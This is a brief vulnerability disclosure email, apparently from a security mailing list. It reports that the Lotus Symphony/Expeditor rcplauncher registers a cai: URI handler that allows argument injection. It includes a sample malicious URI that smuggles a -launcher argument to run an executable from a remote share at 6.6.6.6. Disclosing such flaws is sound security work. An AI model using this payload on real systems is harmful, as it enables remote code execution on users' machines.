Hello,<br><br>I have found that the lotus expeditor rcplauncher as installed by lotus symphony and possibly other products, registers a cai: uri handler.<br>This handler executes<br>"D:\Program Files\IBM\Lotus\Symphony<div id="mb_0">
\framework\rcp\rcplauncher.exe" -config notes -com.ibm.rcp.portal.app.ui#openCA "%1"<br>the rcplauncher process accepts various arguments which can be abused to execute arbitrary code.<br>The argument to the -launcher option for example is an executable that will be executed.<br>
<br>malicious uri example:<br>cai:"%20-launcher%20\\<a href="http://6.6.6.6">6.6.6.6</a>\d$\trojan<br><br>Regards,<br><a href="http://thomas.pollet.googlepages.com/">Thomas Pollet</a><br><br></div><br><br>